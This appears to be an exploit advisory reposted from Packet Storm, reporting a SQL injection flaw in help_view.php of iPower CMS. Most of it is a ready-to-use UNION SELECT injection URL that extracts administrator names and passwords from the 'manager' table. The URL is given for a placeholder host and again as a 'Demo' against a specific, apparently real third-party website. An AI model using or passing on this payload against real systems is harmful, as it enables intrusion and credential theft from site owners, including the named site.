iPower CMS suffers from a remote SQL injection vulnerability in help_view.php.
eded95d1c0056156b36ba5d90312bde004b1abe8e4573d9d46d32d3d06968115######################### Securitylab.ir ########################
# Application Info:
# Name: iPower CMS
# Website: http://www.dingwei.cn
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql injection
# Risk: Medium
#===========================================================
# Exploit:
# http://site.com/help_view.php?id=[] and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,name,13,14,15,password,17,18,19,20,21 from manager--
#
# Demo:
# http://iimatchi.com/help_view.php?id=54 and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,name,13,14,15,password,17,18,19,20,21 from manager--
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed